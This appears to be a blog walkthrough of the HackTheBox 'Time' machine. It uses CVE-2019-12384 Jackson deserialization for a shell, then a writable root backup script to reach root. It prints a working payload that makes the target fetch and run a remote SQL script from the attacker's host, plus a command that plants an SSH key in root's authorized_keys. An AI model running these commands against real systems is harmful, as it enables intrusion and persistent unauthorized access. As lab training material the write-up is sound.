HackTheBox: (“Time”) — Walkthrough
Hi People :D
Today we’ll solve “Time” machine from HackTheBox, a medium machine that shows you how some errors can be exploited, so let’s get started
TL;DR
— — —
- Ports 80 and 22 are opened
- After inspect the website functions I found that there is a function that gives a com.fasterxml.jackson.core error when using it
- By exploiting a CVE-2019–12384, I got a pericles shell and got user flag
- After upload LinPEAS and run it, I found timer_backup.sh file that’s owned by pericles and we can edit and run it
- Edit timer_backup.sh to make it copy our SSH public key to root authorized_keys
- SSHed root and got root flag
Enumeration
— — — — — —
Start with Nmap
nmap -A 10.10.10.214
We have two open ports (22/80) so let’s see the website on port 80
Web Enumeration
— — — — — — — —
Navigate to http://10.10.10.214, it’s a JSON Beautifier & Validator
Try to write anything then click process, it gives us null.
Click on the small down arrow, there’s a Validate function and it says that this function is beta
Now change to Validate function and write anything then click process, it gives an error
Exploitation
— — — — — —
After reading this error, I noticed that com.fasterxml.jackson.core looks interesting, so I decided to search for exploitation and found this github repo with steps to reproduce
As an upper image, first we need to create a file called inject.sql and just copy this block of code but change the last line to get a reverse shell then start python HTTP server
In our case we don’t need the upper ruby script, we just need the exploit command but without all backslashes (“\”).
User Flag
— — — — —
After removing all backslashes, the command looks like this:
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://{Your_IP}:8000/inject.sql’"}]
Set Netcat listener then paste this command in the website and we got a shell as pericles
Do some improvements to your shell with these commands:
python3 -c 'import pty; pty.spawn("/bin/bash")' exportTERM=linux
Then navigate to home directory and read user.txt to get the flag
Root Flag
— — — — —
Let’s upload LinPEAS to automate system and files enumeration then give it execution permission with chmod +x linpeas.sh
After running LinPEAS, there’s a file called timer_backup.sh in the Backup files section, the interesting thing about this script is that it’s owned by pericles and we can write and execute it
Navigate to /usr/bin then read timer_backup.sh, it contains unimportant command
Now we need to edit this script to copy our SSH public key to root authorized_keys so that we can SSH into root.
First, generate your SSH keys with this command :
ssh-keygen -t rsaSecond, copy id_rsa.pub content then edit timer_backup.sh to make it paste our SSH key into root authorized_keys, this command can do the job :
echo "echo {Your_SSH_PubKey} >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh
After copying our key to root authorized_keys, just SSH into root using your generated keys :
ssh -i ~/.ssh/id_rsa root@10.10.10.214And we successfully SSHed into root :D read /root/root.txt to get root flag
Thanks for reading and I hope you love this writeup ❤
